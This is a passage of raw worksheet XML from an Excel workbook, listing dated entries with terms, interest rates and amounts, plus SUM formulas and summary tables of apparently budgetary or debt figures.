    <row r="8" s="238" customFormat="1" ht="15.95" customHeight="1" spans="1:7">
      <c r="A8" s="248"/>
      <c r="B8" s="249">
        <v>45769</v>
      </c>
      <c r="C8" s="247" t="s">
        <v>2254</v>
      </c>
      <c r="D8" s="250">
        <v>7</v>
      </c>
      <c r="E8" s="251">
        <v>0.0165</v>
      </c>
      <c r="F8" s="252">
        <v>2500</v>
      </c>
      <c r="G8" s="253"/>
    </row>
    <row r="9" s="238" customFormat="1" ht="15.95" customHeight="1" spans="1:7">
      <c r="A9" s="248"/>
      <c r="B9" s="254"/>
      <c r="C9" s="248"/>
      <c r="D9" s="250">
        <v>10</v>
      </c>
      <c r="E9" s="251">
        <v>0.0184</v>
      </c>
      <c r="F9" s="250">
        <v>7300</v>
      </c>
      <c r="G9" s="253"/>
    </row>
    <row r="10" s="238" customFormat="1" ht="15.95" customHeight="1" spans="1:7">
      <c r="A10" s="248"/>
      <c r="B10" s="255"/>
      <c r="C10" s="256"/>
      <c r="D10" s="250">
        <v>30</v>
      </c>
      <c r="E10" s="251">
        <v>0.0213</v>
      </c>
      <c r="F10" s="250">
        <v>3000</v>
      </c>
      <c r="G10" s="253"/>
    </row>
    <row r="11" s="238" customFormat="1" ht="15.95" customHeight="1" spans="1:7">
      <c r="A11" s="248"/>
      <c r="B11" s="249">
        <v>45799</v>
      </c>
      <c r="C11" s="247" t="s">
        <v>2254</v>
      </c>
      <c r="D11" s="250">
        <v>10</v>
      </c>
      <c r="E11" s="251">
        <v>0.0182</v>
      </c>
      <c r="F11" s="252">
        <v>10000</v>
      </c>
      <c r="G11" s="253"/>
    </row>
    <row r="12" s="238" customFormat="1" ht="15.95" customHeight="1" spans="1:7">
      <c r="A12" s="248"/>
      <c r="B12" s="255"/>
      <c r="C12" s="256"/>
      <c r="D12" s="250">
        <v>30</v>
      </c>
      <c r="E12" s="251">
        <v>0.0211</v>
      </c>
      <c r="F12" s="252">
        <v>9700</v>
      </c>
      <c r="G12" s="253"/>
    </row>
    <row r="13" s="238" customFormat="1" ht="15.95" customHeight="1" spans="1:7">
      <c r="A13" s="248"/>
      <c r="B13" s="257">
        <v>45831</v>
      </c>
      <c r="C13" s="253" t="s">
        <v>2254</v>
      </c>
      <c r="D13" s="250">
        <v>10</v>
      </c>
      <c r="E13" s="251">
        <v>0.0174</v>
      </c>
      <c r="F13" s="252">
        <v>16400</v>
      </c>
      <c r="G13" s="253"/>
    </row>
    <row r="14" s="238" customFormat="1" ht="15.95" customHeight="1" spans="1:7">
      <c r="A14" s="248"/>
      <c r="B14" s="257"/>
      <c r="C14" s="253"/>
      <c r="D14" s="250">
        <v>30</v>
      </c>
      <c r="E14" s="251">
        <v>0.0202</v>
      </c>
      <c r="F14" s="252">
        <v>9600</v>
      </c>
      <c r="G14" s="253"/>
    </row>
    <row r="15" s="238" customFormat="1" ht="15.95" customHeight="1" spans="1:7">
      <c r="A15" s="248"/>
      <c r="B15" s="257">
        <v>45855</v>
      </c>
      <c r="C15" s="247" t="s">
        <v>2254</v>
      </c>
      <c r="D15" s="258">
        <v>7</v>
      </c>
      <c r="E15" s="259">
        <v>0.0168</v>
      </c>
      <c r="F15" s="256">
        <v>5500</v>
      </c>
      <c r="G15" s="260"/>
    </row>
    <row r="16" s="238" customFormat="1" ht="15.95" customHeight="1" spans="1:7">
      <c r="A16" s="248"/>
      <c r="B16" s="257"/>
      <c r="C16" s="261"/>
      <c r="D16" s="258">
        <v>15</v>
      </c>
      <c r="E16" s="259">
        <v>0.0194</v>
      </c>
      <c r="F16" s="256">
        <v>10000</v>
      </c>
      <c r="G16" s="260"/>
    </row>
    <row r="17" s="238" customFormat="1" ht="15.95" customHeight="1" spans="1:7">
      <c r="A17" s="248"/>
      <c r="B17" s="257"/>
      <c r="C17" s="260"/>
      <c r="D17" s="258">
        <v>30</v>
      </c>
      <c r="E17" s="259">
        <v>0.0203</v>
      </c>
      <c r="F17" s="256">
        <v>15000</v>
      </c>
      <c r="G17" s="260"/>
    </row>
    <row r="18" s="238" customFormat="1" ht="15.95" customHeight="1" spans="1:7">
      <c r="A18" s="248"/>
      <c r="B18" s="254">
        <v>45889</v>
      </c>
      <c r="C18" s="247" t="s">
        <v>2254</v>
      </c>
      <c r="D18" s="258">
        <v>15</v>
      </c>
      <c r="E18" s="259">
        <v>0.0228</v>
      </c>
      <c r="F18" s="256">
        <v>500</v>
      </c>
      <c r="G18" s="260"/>
    </row>
    <row r="19" s="238" customFormat="1" ht="15.95" customHeight="1" spans="1:7">
      <c r="A19" s="248"/>
      <c r="B19" s="257">
        <v>45919</v>
      </c>
      <c r="C19" s="247" t="s">
        <v>2254</v>
      </c>
      <c r="D19" s="258">
        <v>10</v>
      </c>
      <c r="E19" s="259">
        <v>0.0212</v>
      </c>
      <c r="F19" s="256">
        <v>1500</v>
      </c>
      <c r="G19" s="260"/>
    </row>
    <row r="20" s="238" customFormat="1" ht="15.95" customHeight="1" spans="1:7">
      <c r="A20" s="248"/>
      <c r="B20" s="257"/>
      <c r="C20" s="260"/>
      <c r="D20" s="258">
        <v>10</v>
      </c>
      <c r="E20" s="259">
        <v>0.021</v>
      </c>
      <c r="F20" s="256">
        <v>7500</v>
      </c>
      <c r="G20" s="260"/>
    </row>
    <row r="21" s="238" customFormat="1" ht="15.95" customHeight="1" spans="1:7">
      <c r="A21" s="248"/>
      <c r="B21" s="249">
        <v>45950</v>
      </c>
      <c r="C21" s="247" t="s">
        <v>2254</v>
      </c>
      <c r="D21" s="258">
        <v>10</v>
      </c>
      <c r="E21" s="259">
        <v>0.0205</v>
      </c>
      <c r="F21" s="256">
        <v>12500</v>
      </c>
      <c r="G21" s="260"/>
    </row>
    <row r="22" s="238" customFormat="1" ht="15.95" customHeight="1" spans="1:7">
      <c r="A22" s="248"/>
      <c r="B22" s="255"/>
      <c r="C22" s="260"/>
      <c r="D22" s="258">
        <v>30</v>
      </c>
      <c r="E22" s="259">
        <v>0.0239</v>
      </c>
      <c r="F22" s="256">
        <v>7500</v>
      </c>
      <c r="G22" s="260"/>
    </row>
    <row r="23" s="238" customFormat="1" ht="15.95" customHeight="1" spans="1:7">
      <c r="A23" s="248"/>
      <c r="B23" s="257">
        <v>45960</v>
      </c>
      <c r="C23" s="247" t="s">
        <v>2254</v>
      </c>
      <c r="D23" s="258">
        <v>30</v>
      </c>
      <c r="E23" s="259">
        <v>0.0239</v>
      </c>
      <c r="F23" s="256">
        <v>1000</v>
      </c>
      <c r="G23" s="260"/>
    </row>
    <row r="24" s="238" customFormat="1" ht="15.95" customHeight="1" spans="1:7">
      <c r="A24" s="248"/>
      <c r="B24" s="257">
        <v>45986</v>
      </c>
      <c r="C24" s="247" t="s">
        <v>2254</v>
      </c>
      <c r="D24" s="258">
        <v>30</v>
      </c>
      <c r="E24" s="259">
        <v>0.0239</v>
      </c>
      <c r="F24" s="256">
        <v>3000</v>
      </c>
      <c r="G24" s="260"/>
    </row>
    <row r="25" s="238" customFormat="1" ht="15.95" customHeight="1" spans="1:7">
      <c r="A25" s="252" t="s">
        <v>2253</v>
      </c>
      <c r="B25" s="244" t="s">
        <v>2319</v>
      </c>
      <c r="C25" s="244"/>
      <c r="D25" s="244"/>
      <c r="E25" s="244"/>
      <c r="F25" s="244">
        <f>SUM(F26:F35)</f>
        <v>66140</v>
      </c>
      <c r="G25" s="253"/>
    </row>
    <row r="26" s="238" customFormat="1" ht="15.95" customHeight="1" spans="1:7">
      <c r="A26" s="252"/>
      <c r="B26" s="257">
        <v>45679</v>
      </c>
      <c r="C26" s="253" t="s">
        <v>2320</v>
      </c>
      <c r="D26" s="250">
        <v>20</v>
      </c>
      <c r="E26" s="251">
        <v>0.0205</v>
      </c>
      <c r="F26" s="252">
        <v>8900</v>
      </c>
      <c r="G26" s="253"/>
    </row>
    <row r="27" s="238" customFormat="1" ht="15.95" customHeight="1" spans="1:7">
      <c r="A27" s="252"/>
      <c r="B27" s="257"/>
      <c r="C27" s="253" t="s">
        <v>2320</v>
      </c>
      <c r="D27" s="250">
        <v>30</v>
      </c>
      <c r="E27" s="251">
        <v>0.0204</v>
      </c>
      <c r="F27" s="252">
        <v>8800</v>
      </c>
      <c r="G27" s="253"/>
    </row>
    <row r="28" s="238" customFormat="1" ht="15.95" customHeight="1" spans="1:7">
      <c r="A28" s="252"/>
      <c r="B28" s="249">
        <v>45740</v>
      </c>
      <c r="C28" s="253" t="s">
        <v>2320</v>
      </c>
      <c r="D28" s="250">
        <v>15</v>
      </c>
      <c r="E28" s="251">
        <v>0.0226</v>
      </c>
      <c r="F28" s="252">
        <v>11800</v>
      </c>
      <c r="G28" s="253"/>
    </row>
    <row r="29" s="238" customFormat="1" ht="15.95" customHeight="1" spans="1:7">
      <c r="A29" s="252"/>
      <c r="B29" s="255"/>
      <c r="C29" s="253" t="s">
        <v>2320</v>
      </c>
      <c r="D29" s="250">
        <v>30</v>
      </c>
      <c r="E29" s="251">
        <v>0.0229</v>
      </c>
      <c r="F29" s="250">
        <v>11600</v>
      </c>
      <c r="G29" s="253"/>
    </row>
    <row r="30" s="238" customFormat="1" ht="15.95" customHeight="1" spans="1:7">
      <c r="A30" s="252"/>
      <c r="B30" s="257">
        <v>45789</v>
      </c>
      <c r="C30" s="253" t="s">
        <v>2321</v>
      </c>
      <c r="D30" s="250">
        <v>10</v>
      </c>
      <c r="E30" s="251">
        <v>0.0178</v>
      </c>
      <c r="F30" s="250">
        <v>640</v>
      </c>
      <c r="G30" s="253"/>
    </row>
    <row r="31" s="238" customFormat="1" ht="15.95" customHeight="1" spans="1:7">
      <c r="A31" s="252"/>
      <c r="B31" s="257">
        <v>45799</v>
      </c>
      <c r="C31" s="253" t="s">
        <v>2321</v>
      </c>
      <c r="D31" s="250">
        <v>10</v>
      </c>
      <c r="E31" s="251">
        <v>0.0182</v>
      </c>
      <c r="F31" s="250">
        <v>1930</v>
      </c>
      <c r="G31" s="253"/>
    </row>
    <row r="32" s="238" customFormat="1" ht="15.95" customHeight="1" spans="1:7">
      <c r="A32" s="252"/>
      <c r="B32" s="249">
        <v>45831</v>
      </c>
      <c r="C32" s="253" t="s">
        <v>2320</v>
      </c>
      <c r="D32" s="250">
        <v>15</v>
      </c>
      <c r="E32" s="251">
        <v>0.0194</v>
      </c>
      <c r="F32" s="250">
        <v>9000</v>
      </c>
      <c r="G32" s="253"/>
    </row>
    <row r="33" s="238" customFormat="1" ht="15.95" customHeight="1" spans="1:7">
      <c r="A33" s="252"/>
      <c r="B33" s="255"/>
      <c r="C33" s="253" t="s">
        <v>2320</v>
      </c>
      <c r="D33" s="250">
        <v>30</v>
      </c>
      <c r="E33" s="251">
        <v>0.0202</v>
      </c>
      <c r="F33" s="250">
        <v>8900</v>
      </c>
      <c r="G33" s="257"/>
    </row>
    <row r="34" s="238" customFormat="1" ht="15.95" customHeight="1" spans="1:7">
      <c r="A34" s="252"/>
      <c r="B34" s="257">
        <v>45905</v>
      </c>
      <c r="C34" s="253" t="s">
        <v>2321</v>
      </c>
      <c r="D34" s="250">
        <v>10</v>
      </c>
      <c r="E34" s="251">
        <v>0.0201</v>
      </c>
      <c r="F34" s="250">
        <v>2570</v>
      </c>
      <c r="G34" s="257"/>
    </row>
    <row r="35" s="238" customFormat="1" ht="15.95" customHeight="1" spans="1:7">
      <c r="A35" s="252"/>
      <c r="B35" s="257">
        <v>45986</v>
      </c>
      <c r="C35" s="253" t="s">
        <v>2321</v>
      </c>
      <c r="D35" s="250">
        <v>10</v>
      </c>
      <c r="E35" s="251">
        <v>0.0198</v>
      </c>
      <c r="F35" s="250">
        <v>2000</v>
      </c>
      <c r="G35" s="257"/>
    </row>
    <row r="36" s="238" customFormat="1" spans="1:7">
      <c r="A36" s="262" t="s">
        <v>2206</v>
      </c>
      <c r="G36" s="262"/>
    </row>
    <row r="37" s="238" customFormat="1" ht="15" customHeight="1" spans="1:7">
      <c r="A37" s="262" t="s">
        <v>2322</v>
      </c>
      <c r="G37" s="262"/>
    </row>
  </sheetData>
  <mergeCells count="21">
    <mergeCell ref="A2:G2"/>
    <mergeCell ref="A5:E5"/>
    <mergeCell ref="B6:E6"/>
    <mergeCell ref="B25:E25"/>
    <mergeCell ref="A6:A24"/>
    <mergeCell ref="A25:A35"/>
    <mergeCell ref="B8:B10"/>
    <mergeCell ref="B11:B12"/>
    <mergeCell ref="B13:B14"/>
    <mergeCell ref="B15:B17"/>
    <mergeCell ref="B19:B20"/>
    <mergeCell ref="B21:B22"/>
    <mergeCell ref="B26:B27"/>
    <mergeCell ref="B28:B29"/>
    <mergeCell ref="B32:B33"/>
    <mergeCell ref="C8:C10"/>
    <mergeCell ref="C11:C12"/>
    <mergeCell ref="C13:C14"/>
    <mergeCell ref="C15:C17"/>
    <mergeCell ref="C19:C20"/>
    <mergeCell ref="C21:C22"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.751388888888889" right="0.751388888888889" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" scale="84" orientation="portrait"/>
  <headerFooter/>
</worksheet>
</file>

<file path=xl/worksheets/sheet7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3" tint="0.799981688894314"/>
  </sheetPr>
  <dimension ref="A1:I25"/>
  <sheetViews>
    <sheetView view="pageBreakPreview" zoomScaleNormal="100" zoomScaleSheetLayoutView="100" workbookViewId="0">
      <pane xSplit="1" ySplit="5" topLeftCell="B6" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="C20" sqref="C20"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="15.6"/>
  <cols>
    <col min="1" max="1" width="43.4259259259259" style="184" customWidth="1"/>
    <col min="2" max="2" width="17.9351851851852" style="184" customWidth="1"/>
    <col min="3" max="3" width="19.0462962962963" style="184" customWidth="1"/>
    <col min="4" max="16384" width="10" style="184"/>
  </cols>
  <sheetData>
    <row r="1" s="184" customFormat="1" ht="18" customHeight="1" spans="1:3">
      <c r="A1" s="186" t="s">
        <v>2323</v>
      </c>
      <c r="B1" s="218"/>
      <c r="C1" s="218"/>
    </row>
    <row r="2" s="184" customFormat="1" ht="28.15" customHeight="1" spans="1:3">
      <c r="A2" s="219" t="s">
        <v>2324</v>
      </c>
      <c r="B2" s="219"/>
      <c r="C2" s="219"/>
    </row>
    <row r="3" s="184" customFormat="1" ht="21" customHeight="1" spans="1:3">
      <c r="A3" s="220"/>
      <c r="B3" s="220"/>
      <c r="C3" s="211" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" s="184" customFormat="1" ht="36.95" customHeight="1" spans="1:3">
      <c r="A4" s="221" t="s">
        <v>2325</v>
      </c>
      <c r="B4" s="222" t="s">
        <v>2326</v>
      </c>
      <c r="C4" s="223" t="s">
        <v>2327</v>
      </c>
    </row>
    <row r="5" s="184" customFormat="1" ht="29.1" customHeight="1" spans="1:9">
      <c r="A5" s="224" t="s">
        <v>2328</v>
      </c>
      <c r="B5" s="225">
        <f t="shared" ref="B5:B25" si="0">C5</f>
        <v>206640</v>
      </c>
      <c r="C5" s="226">
        <f>C6+C8</f>
        <v>206640</v>
      </c>
      <c r="G5" s="227"/>
      <c r="H5" s="227"/>
      <c r="I5" s="227"/>
    </row>
    <row r="6" s="184" customFormat="1" ht="29.1" customHeight="1" spans="1:9">
      <c r="A6" s="224" t="s">
        <v>2329</v>
      </c>
      <c r="B6" s="228">
        <f t="shared" si="0"/>
        <v>7140</v>
      </c>
      <c r="C6" s="226">
        <v>7140</v>
      </c>
      <c r="G6" s="227"/>
      <c r="H6" s="227"/>
      <c r="I6" s="227"/>
    </row>
    <row r="7" s="184" customFormat="1" ht="29.1" customHeight="1" spans="1:9">
      <c r="A7" s="224" t="s">
        <v>2330</v>
      </c>
      <c r="B7" s="229">
        <f t="shared" si="0"/>
        <v>7140</v>
      </c>
      <c r="C7" s="230">
        <v>7140</v>
      </c>
      <c r="G7" s="227"/>
      <c r="H7" s="227"/>
      <c r="I7" s="227"/>
    </row>
    <row r="8" s="184" customFormat="1" ht="29.1" customHeight="1" spans="1:9">
      <c r="A8" s="224" t="s">
        <v>2331</v>
      </c>
      <c r="B8" s="228">
        <f t="shared" si="0"/>
        <v>199500</v>
      </c>
      <c r="C8" s="226">
        <v>199500</v>
      </c>
      <c r="G8" s="227"/>
      <c r="H8" s="227"/>
      <c r="I8" s="227"/>
    </row>
    <row r="9" s="184" customFormat="1" ht="29.1" customHeight="1" spans="1:9">
      <c r="A9" s="224" t="s">
        <v>2330</v>
      </c>
      <c r="B9" s="229">
        <f t="shared" si="0"/>
        <v>59000</v>
      </c>
      <c r="C9" s="230">
        <v>59000</v>
      </c>
      <c r="G9" s="227"/>
      <c r="H9" s="227"/>
      <c r="I9" s="227"/>
    </row>
    <row r="10" s="184" customFormat="1" ht="29.1" customHeight="1" spans="1:9">
      <c r="A10" s="224" t="s">
        <v>2332</v>
      </c>
      <c r="B10" s="228">
        <f t="shared" si="0"/>
        <v>69360</v>
      </c>
      <c r="C10" s="226">
        <v>69360</v>
      </c>
      <c r="G10" s="227"/>
      <c r="H10" s="227"/>
      <c r="I10" s="227"/>
    </row>
    <row r="11" s="184" customFormat="1" ht="29.1" customHeight="1" spans="1:9">
      <c r="A11" s="224" t="s">
        <v>2329</v>
      </c>
      <c r="B11" s="229">
        <f t="shared" si="0"/>
        <v>5729</v>
      </c>
      <c r="C11" s="230">
        <v>5729</v>
      </c>
      <c r="G11" s="227"/>
      <c r="H11" s="227"/>
      <c r="I11" s="227"/>
    </row>
    <row r="12" s="184" customFormat="1" ht="29.1" customHeight="1" spans="1:9">
      <c r="A12" s="224" t="s">
        <v>2331</v>
      </c>
      <c r="B12" s="229">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C12" s="230">
        <v>0</v>
      </c>
      <c r="G12" s="227"/>
      <c r="H12" s="227"/>
      <c r="I12" s="227"/>
    </row>
    <row r="13" s="184" customFormat="1" ht="29.1" customHeight="1" spans="1:9">
      <c r="A13" s="224" t="s">
        <v>2333</v>
      </c>
      <c r="B13" s="231">
        <f t="shared" si="0"/>
        <v>28161.93555</v>
      </c>
      <c r="C13" s="232">
        <f>C14+C15</f>
        <v>28161.93555</v>
      </c>
      <c r="G13" s="227"/>
      <c r="H13" s="227"/>
      <c r="I13" s="227"/>
    </row>
    <row r="14" s="184" customFormat="1" ht="29.1" customHeight="1" spans="1:9">
      <c r="A14" s="224" t="s">
        <v>2329</v>
      </c>
      <c r="B14" s="233">
        <f t="shared" si="0"/>
        <v>4467.20445</v>
      </c>
      <c r="C14" s="234">
        <v>4467.20445</v>
      </c>
      <c r="G14" s="227"/>
      <c r="H14" s="227"/>
      <c r="I14" s="227"/>
    </row>
    <row r="15" s="184" customFormat="1" ht="29.1" customHeight="1" spans="1:9">
      <c r="A15" s="224" t="s">
        <v>2331</v>
      </c>
      <c r="B15" s="233">
        <f t="shared" si="0"/>
        <v>23694.7311</v>
      </c>
      <c r="C15" s="234">
        <v>23694.7311</v>
      </c>
      <c r="G15" s="227"/>
      <c r="H15" s="227"/>
      <c r="I15" s="227"/>
    </row>
    <row r="16" s="184" customFormat="1" ht="29.1" customHeight="1" spans="1:9">
      <c r="A16" s="224" t="s">
        <v>2334</v>
      </c>
      <c r="B16" s="228">
        <f t="shared" si="0"/>
        <v>44860</v>
      </c>
      <c r="C16" s="226">
        <f>C17+C20</f>
        <v>44860</v>
      </c>
      <c r="G16" s="227"/>
      <c r="H16" s="227"/>
      <c r="I16" s="227"/>
    </row>
    <row r="17" s="184" customFormat="1" ht="29.1" customHeight="1" spans="1:9">
      <c r="A17" s="224" t="s">
        <v>2329</v>
      </c>
      <c r="B17" s="228">
        <f t="shared" si="0"/>
        <v>26640</v>
      </c>
      <c r="C17" s="226">
        <f>C18+C19</f>
        <v>26640</v>
      </c>
      <c r="G17" s="227"/>
      <c r="H17" s="227"/>
      <c r="I17" s="227"/>
    </row>
    <row r="18" s="184" customFormat="1" ht="29.1" customHeight="1" spans="1:9">
      <c r="A18" s="224" t="s">
        <v>2330</v>
      </c>
      <c r="B18" s="229">
        <f t="shared" si="0"/>
        <v>23976</v>
      </c>
      <c r="C18" s="230">
        <v>23976</v>
      </c>
      <c r="G18" s="227"/>
      <c r="H18" s="227"/>
      <c r="I18" s="227"/>
    </row>
    <row r="19" s="184" customFormat="1" ht="29.1" customHeight="1" spans="1:9">
      <c r="A19" s="224" t="s">
        <v>2335</v>
      </c>
      <c r="B19" s="229">
        <f t="shared" si="0"/>
        <v>2664</v>
      </c>
      <c r="C19" s="230">
        <v>2664</v>
      </c>
      <c r="G19" s="227"/>
      <c r="H19" s="227"/>
      <c r="I19" s="227"/>
    </row>
    <row r="20" s="184" customFormat="1" ht="29.1" customHeight="1" spans="1:9">
      <c r="A20" s="224" t="s">
        <v>2331</v>
      </c>
      <c r="B20" s="228">
        <f t="shared" si="0"/>
        <v>18220</v>
      </c>
      <c r="C20" s="226">
        <f>C21+C22</f>
        <v>18220</v>
      </c>
      <c r="G20" s="227"/>
      <c r="H20" s="227"/>
      <c r="I20" s="227"/>
    </row>
    <row r="21" s="184" customFormat="1" ht="29.1" customHeight="1" spans="1:9">
      <c r="A21" s="224" t="s">
        <v>2330</v>
      </c>
      <c r="B21" s="229">
        <f t="shared" si="0"/>
        <v>16398</v>
      </c>
      <c r="C21" s="230">
        <v>16398</v>
      </c>
      <c r="G21" s="227"/>
      <c r="H21" s="227"/>
      <c r="I21" s="227"/>
    </row>
    <row r="22" s="184" customFormat="1" ht="29.1" customHeight="1" spans="1:9">
      <c r="A22" s="224" t="s">
        <v>2335</v>
      </c>
      <c r="B22" s="229">
        <f t="shared" si="0"/>
        <v>1822</v>
      </c>
      <c r="C22" s="230">
        <v>1822</v>
      </c>
      <c r="G22" s="227"/>
      <c r="H22" s="227"/>
      <c r="I22" s="227"/>
    </row>
    <row r="23" s="184" customFormat="1" ht="29.1" customHeight="1" spans="1:9">
      <c r="A23" s="224" t="s">
        <v>2336</v>
      </c>
      <c r="B23" s="228">
        <f t="shared" si="0"/>
        <v>32412</v>
      </c>
      <c r="C23" s="226">
        <f>C24+C25</f>
        <v>32412</v>
      </c>
      <c r="G23" s="227"/>
      <c r="H23" s="227"/>
      <c r="I23" s="227"/>
    </row>
    <row r="24" s="184" customFormat="1" ht="29.1" customHeight="1" spans="1:9">
      <c r="A24" s="224" t="s">
        <v>2329</v>
      </c>
      <c r="B24" s="229">
        <f t="shared" si="0"/>
        <v>4452</v>
      </c>
      <c r="C24" s="230">
        <v>4452</v>
      </c>
      <c r="G24" s="227"/>
      <c r="H24" s="227"/>
      <c r="I24" s="227"/>
    </row>
    <row r="25" s="184" customFormat="1" ht="29.1" customHeight="1" spans="1:9">
      <c r="A25" s="235" t="s">
        <v>2331</v>
      </c>
      <c r="B25" s="236">
        <f t="shared" si="0"/>
        <v>27960</v>
      </c>
      <c r="C25" s="237">
        <v>27960</v>
      </c>
      <c r="G25" s="227"/>
      <c r="H25" s="227"/>
      <c r="I25" s="227"/>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A2:C2"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.751388888888889" right="0.751388888888889" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" orientation="portrait"/>
  <headerFooter/>
</worksheet>
</file>

<file path=xl/worksheets/sheet7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3" tint="0.799981688894314"/>
  </sheetPr>
  <dimension ref="A1:B51"/>
  <sheetViews>
    <sheetView view="pageBreakPreview" zoomScaleNormal="100" zoomScaleSheetLayoutView="100" workbookViewId="0">
      <pane xSplit="1" ySplit="6" topLeftCell="B10" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="C5" sqref="C5"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.72222222222222" defaultRowHeight="15.6" outlineLevelCol="1"/>
  <cols>
    <col min="1" max="1" width="67.2777777777778" style="185" customWidth="1"/>
    <col min="2" max="2" width="18.5740740740741" style="208" customWidth="1"/>
    <col min="3" max="4" width="12" style="185" customWidth="1"/>
    <col min="5" max="5" width="9.72222222222222" style="185"/>
    <col min="6" max="6" width="12" style="185" customWidth="1"/>
    <col min="7" max="252" width="9.72222222222222" style="185"/>
    <col min="253" max="253" width="50.4259259259259" style="185" customWidth="1"/>
    <col min="254" max="254" width="43" style="185" customWidth="1"/>
    <col min="255" max="16384" width="9.72222222222222" style="185"/>
  </cols>
  <sheetData>
    <row r="1" s="205" customFormat="1" ht="18" customHeight="1" spans="1:2">
      <c r="A1" s="186" t="s">
        <v>2337</v>
      </c>
      <c r="B1" s="209"/>
    </row>
    <row r="2" s="206" customFormat="1" ht="25.8" spans="1:2">
      <c r="A2" s="188" t="s">
        <v>2338</v>
      </c>
      <c r="B2" s="188"/>
    </row>
    <row r="3" s="207" customFormat="1" ht="18.95" customHeight="1" spans="1:2">
      <c r="A3" s="210"/>
      <c r="B3" s="211" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" s="207" customFormat="1" ht="30.95" customHeight="1" spans="1:2">
      <c r="A4" s="212" t="s">
        <v>828</v>
      </c>
      <c r="B4" s="213" t="s">
        <v>2339</v>
      </c>
    </row>
    <row r="5" s="207" customFormat="1" ht="26.1" customHeight="1" spans="1:2">
      <c r="A5" s="193" t="s">
        <v>2340</v>
      </c>
      <c r="B5" s="194">
        <v>1129050</v>
      </c>
    </row>
    <row r="6" s="207" customFormat="1" ht="26.1" customHeight="1" spans="1:2">
      <c r="A6" s="195" t="s">
        <v>2341</v>
      </c>
      <c r="B6" s="194">
        <f>B7+B10</f>
        <v>200374</v>
      </c>
    </row>
    <row r="7" s="207" customFormat="1" ht="26.1" customHeight="1" spans="1:2">
      <c r="A7" s="196" t="s">
        <v>2342</v>
      </c>
      <c r="B7" s="197">
        <v>100000</v>
      </c>
    </row>
    <row r="8" s="207" customFormat="1" ht="26.1" customHeight="1" spans="1:2">
      <c r="A8" s="196" t="s">
        <v>2343</v>
      </c>
      <c r="B8" s="197"/>
    </row>
    <row r="9" s="207" customFormat="1" ht="26.1" customHeight="1" spans="1:2">
      <c r="A9" s="196" t="s">
        <v>2344</v>
      </c>
      <c r="B9" s="197">
        <v>100000</v>
      </c>
    </row>
    <row r="10" s="207" customFormat="1" ht="26.1" customHeight="1" spans="1:2">
      <c r="A10" s="196" t="s">
        <v>2345</v>
      </c>
      <c r="B10" s="197">
        <f>60000+23976+16398</f>
        <v>100374</v>
      </c>
    </row>
    <row r="11" s="207" customFormat="1" ht="26.1" customHeight="1" spans="1:2">
      <c r="A11" s="195" t="s">
        <v>2346</v>
      </c>
      <c r="B11" s="214">
        <f>B12+B13+B14</f>
        <v>144860</v>
      </c>
    </row>
    <row r="12" s="207" customFormat="1" ht="26.1" customHeight="1" spans="1:2">
      <c r="A12" s="196" t="s">
        <v>2347</v>
      </c>
      <c r="B12" s="197"/>
    </row>
    <row r="13" s="207" customFormat="1" ht="26.1" customHeight="1" spans="1:2">
      <c r="A13" s="196" t="s">
        <v>2348</v>
      </c>
      <c r="B13" s="197">
        <v>100000</v>
      </c>
    </row>
    <row r="14" s="207" customFormat="1" ht="26.1" customHeight="1" spans="1:2">
      <c r="A14" s="196" t="s">
        <v>2349</v>
      </c>
      <c r="B14" s="197">
        <f>B15+B18+B19</f>
        <v>44860</v>
      </c>
    </row>
    <row r="15" s="207" customFormat="1" ht="26.1" customHeight="1" spans="1:2">
      <c r="A15" s="196" t="s">
        <v>2350</v>
      </c>
      <c r="B15" s="197">
        <f>B16+B17</f>
        <v>40374</v>
      </c>
    </row>
    <row r="16" s="207" customFormat="1" ht="26.1" customHeight="1" spans="1:2">
      <c r="A16" s="196" t="s">
        <v>2351</v>
      </c>
      <c r="B16" s="197">
        <v>23976</v>
      </c>
    </row>
    <row r="17" s="207" customFormat="1" ht="26.1" customHeight="1" spans="1:2">
      <c r="A17" s="196" t="s">
        <v>2352</v>
      </c>
      <c r="B17" s="197">
        <v>16398</v>
      </c>
    </row>
    <row r="18" s="207" customFormat="1" ht="26.1" customHeight="1" spans="1:2">
      <c r="A18" s="196" t="s">
        <v>2353</v>
      </c>
      <c r="B18" s="197">
        <v>2664</v>
      </c>
    </row>
    <row r="19" s="207" customFormat="1" ht="26.1" customHeight="1" spans="1:2">
      <c r="A19" s="196" t="s">
        <v>2354</v>
      </c>
      <c r="B19" s="197">
        <v>1822</v>
      </c>
    </row>
    <row r="20" s="207" customFormat="1" ht="26.1" customHeight="1" spans="1:2">
      <c r="A20" s="198" t="s">
        <v>2355</v>
      </c>
      <c r="B20" s="194">
        <f>B21+B22</f>
        <v>1184564</v>
      </c>
    </row>
    <row r="21" s="207" customFormat="1" ht="26.1" customHeight="1" spans="1:2">
      <c r="A21" s="196" t="s">
        <v>2343</v>
      </c>
      <c r="B21" s="194">
        <v>142796</v>
      </c>
    </row>
    <row r="22" s="207" customFormat="1" ht="26.1" customHeight="1" spans="1:2">
      <c r="A22" s="196" t="s">
        <v>2344</v>
      </c>
      <c r="B22" s="194">
        <v>1041768</v>
      </c>
    </row>
    <row r="23" s="207" customFormat="1" ht="26.1" customHeight="1" spans="1:2">
      <c r="A23" s="198" t="s">
        <v>2356</v>
      </c>
      <c r="B23" s="194">
        <f>B24</f>
        <v>32412</v>
      </c>
    </row>
    <row r="24" s="207" customFormat="1" ht="26.1" customHeight="1" spans="1:2">
      <c r="A24" s="215" t="s">
        <v>2357</v>
      </c>
      <c r="B24" s="197">
        <f>B25+B26</f>
        <v>32412</v>
      </c>
    </row>
